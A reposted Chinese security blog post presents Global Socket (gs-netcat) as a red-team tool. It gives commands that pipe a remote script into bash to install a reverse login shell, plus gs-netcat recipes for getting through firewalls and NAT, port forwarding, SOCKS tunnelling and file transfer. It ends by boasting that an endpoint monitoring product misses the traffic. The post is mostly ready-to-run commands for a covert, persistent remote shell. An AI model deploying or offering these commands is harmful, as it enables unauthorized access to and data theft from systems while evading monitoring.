技术之红蓝运维管理工具 | Global Socket

admin 2024年3月19日16:18:42评论14 views字数 806阅读2分41秒阅读模式

介绍

https://www.gsocket.io/

使用单个命令(完全自动化)部署反向登录shell,并远程访问加密后的shell。
Global Socket允许不同专用网络上的两个工作站相互通信。

某组织说

This must be the quickest way to access a system —— anonymous

使用以下三个命令之一来安装、卸载和访问 :

安装

bash -c "$(curl -fsSL https://gsocket.io/x)"

技术之红蓝运维管理工具 | Global Socket

卸载

GS_UNDO=1 bash -c "$(curl -fsSL https://gsocket.io/x)"

技术之红蓝运维管理工具 | Global Socket

访问

gs-netcat -s "ExampleSecretChangeMe" -i
S="ExampleSecretChangeMe" bash -c "$(curl -fsSL https://gsocket.io/x)"

技术之红蓝运维管理工具 | Global Socket

高阶玩法

https://github.com/hackerschoice/gsocket/

透过防火墙和NAT访问

gs-netcat -l -i

技术之红蓝运维管理工具 | Global Socket

gs-netcat -i -s AABBCCDDEEFFGG

技术之红蓝运维管理工具 | Global Socket

多人协同

技术之红蓝运维管理工具 | Global Socket

端口转发

client

gs-netcat -l -d 127.0.0.1 -p 22

server

gs-netcat -p 2222

技术之红蓝运维管理工具 | Global Socket

建立连接

nc -nv 127.0.0.1 2222

技术之红蓝运维管理工具 | Global Socket

技术之红蓝运维管理工具 | Global Socket

隧道代理

client

gs-netcat -l -S

技术之红蓝运维管理工具 | Global Socket

server

gs-netcat -p 8848

技术之红蓝运维管理工具 | Global Socket

技术之红蓝运维管理工具 | Global Socket

综合来说还比较稳定

文件传输

先生成两个文件一个包含123一个包含ABC然后用zip压缩成test.zip

技术之红蓝运维管理工具 | Global Socket

client

echo "FILETRANSFER"|gs-netcat -l -r >test.zip

技术之红蓝运维管理工具 | Global Socket

server

echo "FILETRANSFER"|gs-netcat <test.zip

技术之红蓝运维管理工具 | Global Socket

某某某终端监测设备监测不到流量)更多用法请自行研究,懂得都懂


原文始发于微信公众号(渗透安全团队):技术之红蓝运维管理工具 | Global Socket

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月19日16:18:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   技术之红蓝运维管理工具 | Global Sockethttp://cn-sec.com/archives/2580836.html

发表评论

匿名网友 填写信息